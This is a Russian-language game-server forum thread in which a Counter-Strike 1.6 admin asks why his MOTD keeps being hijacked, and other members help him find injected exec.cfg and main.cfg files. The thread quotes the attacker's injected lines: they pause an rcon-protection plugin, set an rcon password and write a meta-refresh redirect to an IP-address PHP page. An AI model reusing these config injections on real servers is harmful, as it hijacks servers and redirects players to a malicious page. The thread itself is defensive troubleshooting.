Наши новости:

14-дек	Добавлена поддержка utf8mb4
24-апр	Telegram группа
10-апр	Обновление PHP
11-апр	Раздача читов

Создание, настройка и продвижение counter-strike 1.6 серверов > > Создание, настройка и продвижение counter-strike 1.6 серверов > Защита Игрового сервера > Взламывают motd

Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.

Взламывают motd

Опции

TommyG	13.2.2013, 21:16 Сообщение #1
Стаж: 13 лет Сообщений: 278 Благодарностей: 35 Полезность: 117	Ребята, почему то постоянно подменивают мой мотд на <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://78.110.61.254//laneesus.php?dingagen=499578"> список плагинов: opengl32.amxx TP_aim.amxx amxbans_core.amxx debug amxbans_main.amxx debug statsx.amxx fps.amxx fix.amxx ; AMX Mod X plugins ; Admin Base - Always one has to be activated ;admin.amxx ; admin base (required for any admin-related); ;admin_sql.amxx ; admin base - SQL version (comment admin.amxx) ; Basic admincmd.amxx ; basic admin console commands adminhelp.amxx ; help command for admin console commands adminslots.amxx ; slot reservation multilingual.amxx ; Multi-Lingual management ; Menus menufront.amxx ; front-end for admin menus cmdmenu.amxx ; command menu (speech, settings) plmenu.amxx ; players menu (kick, ban, client cmds.) ;telemenu.amxx ; teleport menu (Fun Module required!) mapsmenu.amxx ; maps menu (vote, changelevel) pluginmenu.amxx ; Menus for commands/cvars organized by plugin ; Chat / Messages adminchat.amxx ; console chat commands ;antiflood.amxx ; prevent clients from chat-flooding the server scrollmsg.amxx ; displays a scrolling message imessage.amxx ; displays information messages adminvote.amxx ; vote commands ; Map related nextmap.amxx ; displays next map in mapcycle mapchooser.amxx ; allows to vote for next map timeleft.amxx ; displays time left on map ; Configuration pausecfg.amxx ; allows to pause and unpause some plugins statscfg.amxx ; allows to manage stats plugins via menu and commands ; Enable to use AMX Mod plugins ;amxmod_compat.amxx ; AMX Mod backwards compatibility layer ; Custom - Add 3rd party plugins here adminlisten.amxx debug colorchat.amxx admin_spec_esp.amxx high_ping_kicker.amxx rules.amxx rs.amxx admin_check.amxx lastmanbets.amxx afkbombtransfer.amxx afkkick.amxx auto_rr.amxx team_grenade_trail.amxx noshield.amxx lastround.amxx instant_autoteambalance.amxx descriptive_fire_in_the_hole.amxx autoreload_on_newround.amxx slaylosers.amxx cfg_hse.amxx say_admin.amxx hl_ultimate_gore_upd.amxx KNife_SpartAAA.amxx adc_name_guard.amxx adc_say_guardian.amxx если честно точно не помню когда такое началось... как-то не уследил ( ну кто смотрит это мотд, его все закрывают еще до его загрузки)) в логах ничего (искал по "motd_write") ркон менял (стоит довольно хардовый ркон, и думаю если бы им завладели то ущерб был бы поболее) пасс от фтп поменял. (аналогично) но увы и ах upd: забыл добавить на motd.txt стоит онли рид Отредактировал: TommyG, - 13.2.2013, 21:17
	Поблагодарили 0 раз Поблагодарили 0 раз

midorfeed	13.2.2013, 21:20 Сообщение #2
Стаж: 13 лет Сообщений: 303 Благодарностей: 87 Полезность: 243	фтп? вспоминай, где указан пароль от фтп, и проверь автозапуск на сюрпризы Отредактировал: midorfeed, - 13.2.2013, 21:21
	Поблагодарили 0 раз Поблагодарили 0 раз

SmEsHoY	13.2.2013, 21:24 Сообщение #3
Стаж: 13 лет Сообщений: 235 Благодарностей: 25 Полезность: 0	https://c-s.net.ua/forum/topic37395.html - последняя информация
	Поблагодарили 1 раз Поблагодарили 1 раз TommyG

TommyG	13.2.2013, 21:24 Сообщение #4
Стаж: 13 лет Сообщений: 278 Благодарностей: 35 Полезность: 117	Кстате только что вот зашел на сервер (мотд стоял дефолтный) специально от админки сменил карту 2 раза и мотд поменялся -> возможно заражен я, (и т.к. у меня фул права мб как то сам изменяю этот мотд) но в config.cfg ничего нету userconfig.cfg вообще нет
	Поблагодарили 0 раз Поблагодарили 0 раз

sergggzi	13.2.2013, 21:26 Сообщение #5
Стаж: 13 лет Сообщений: 6536 Благодарностей: 6222 Полезность: 807	а может быть это? https://c-s.net.ua/forum/topic46373.html?hl=exec.cfg
	Поблагодарили 1 раз Поблагодарили 1 раз TommyG

cs-portal	13.2.2013, 21:30 Сообщение #6
Стаж: 16 лет Сообщений: 8181 Благодарностей: 2709 Полезность: 0	ответ прост = ищи во всех .cfg в папке cstrike.при перезапуске сервера с них включается motd_write и перезаписывает motd
	Поблагодарили 1 раз Поблагодарили 1 раз TommyG

exec1337	13.2.2013, 21:30 Сообщение #7
Стаж: 13 лет Сообщений: 6490 Благодарностей: 2558 Полезность: 491	\configs\maps\exec.cfg \metamod\exec.cfg
	Поблагодарили 2 раз Поблагодарили 2 раз TommyG, ~~urpok~~

TommyG	13.2.2013, 21:34 Сообщение #8
Стаж: 13 лет Сообщений: 278 Благодарностей: 35 Полезность: 117	Цитата(sergggzi @ 13.2.2013, 23:26) а может быть это? https://c-s.net.ua/forum/topic46373.html?hl=exec.cfg е-мае в яблочко! вот что в том файле amxx pause rcon_defencer.amxx rcon_password "56423235642" motdfile motd.txt motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://78.110.62.122//laneesus.php?dingagen=499578"> Цитата(exec1337 @ 13.2.2013, 23:30) \configs\maps\exec.cfg \metamod\exec.cfg омг в main.cfg тоже самое прописано... мда... щас буду шарить
	Поблагодарили 0 раз Поблагодарили 0 раз

SmEsHoY	13.2.2013, 21:34 Сообщение #9
Стаж: 13 лет Сообщений: 235 Благодарностей: 25 Полезность: 0	Цитата(TommyG @ 13.2.2013, 21:24) Кстате только что вот зашел на сервер (мотд стоял дефолтный) специально от админки сменил карту 2 раза и мотд поменялся -> возможно заражен я, (и т.к. у меня фул права мб как то сам изменяю этот мотд) но в config.cfg ничего нету userconfig.cfg вообще нет /servers/cs16_426/cstrike/addons/metamod/ по этому адресу есть exec.cfg?
	Поблагодарили 0 раз Поблагодарили 0 раз

TommyG	13.2.2013, 21:38 Сообщение #10
Стаж: 13 лет Сообщений: 278 Благодарностей: 35 Полезность: 117	upd: вообще в папке \configs\maps во всех файлах .cfg такое... Цитата(SmEsHoY @ 13.2.2013, 23:34) /servers/cs16_426/cstrike/addons/metamod/ по этому адресу есть exec.cfg? да. уже удалил фуф вроде подчистил после 5ти рестартов изменения мотд не наблюдаю спасибо за помощь ребята а я ломал голову и все же хотелось бы вылечить причину а не последствия...как собсна залили эти файлики? фтп? пароль там не простой (который я уже поменял)
	Поблагодарили 0 раз Поблагодарили 0 раз

exec1337	13.2.2013, 21:43 Сообщение #11
Стаж: 13 лет Сообщений: 6490 Благодарностей: 2558 Полезность: 491	Цитата(TommyG @ 13.2.2013, 22:34) омг в main.cfg тоже самое прописано... мда... щас буду шарить Дада,я накосячил имя файла :) Вобщем делайте,как посоветовали. Ищите по дате изменения все файлы,выбирайте подозрительные/новые,решайте вопрос. Также хочу сказать,что у вашего сервера скорее всего украли rcon-пароль. Бесполезно менять rcon. Тут дыра,всёравно опять возьмут. Почитайте тут самую последнюю уязвимость(NEW 13.12.2012): https://c-s.net.ua/forum/topic37395.html
	Поблагодарили 1 раз Поблагодарили 1 раз TommyG

TommyG	13.2.2013, 21:46 Сообщение #12
Стаж: 13 лет Сообщений: 278 Благодарностей: 35 Полезность: 117	Цитата(exec1337 @ 13.2.2013, 23:43) Дада,я накосячил имя файла :) Вобщем делайте,как посоветовали. Ищите по дате изменения все файлы,выбирайте подозрительные/новые,решайте вопрос. Также хочу сказать,что у вашего сервера скорее всего украли rcon-пароль. Бесполезно менять rcon. Тут дыра,всёравно опять возьмут. Почитайте тут самую последнюю уязвимость(NEW 13.12.2012): https://c-s.net.ua/forum/topic37395.html сделал. темку впринципе можно и закрыть. проблема решена. благодарю всех за участие
	Поблагодарили 1 раз Поблагодарили 1 раз pulse.

« Предыдущая тема · Защита Игрового сервера · Следующая тема »

0 пользователей и 1 гостей читают эту тему:

Режим отображения: Стандартный · Переключить на: Линейный · Переключить на: Древовидный

Сообщить другу · Версия для печати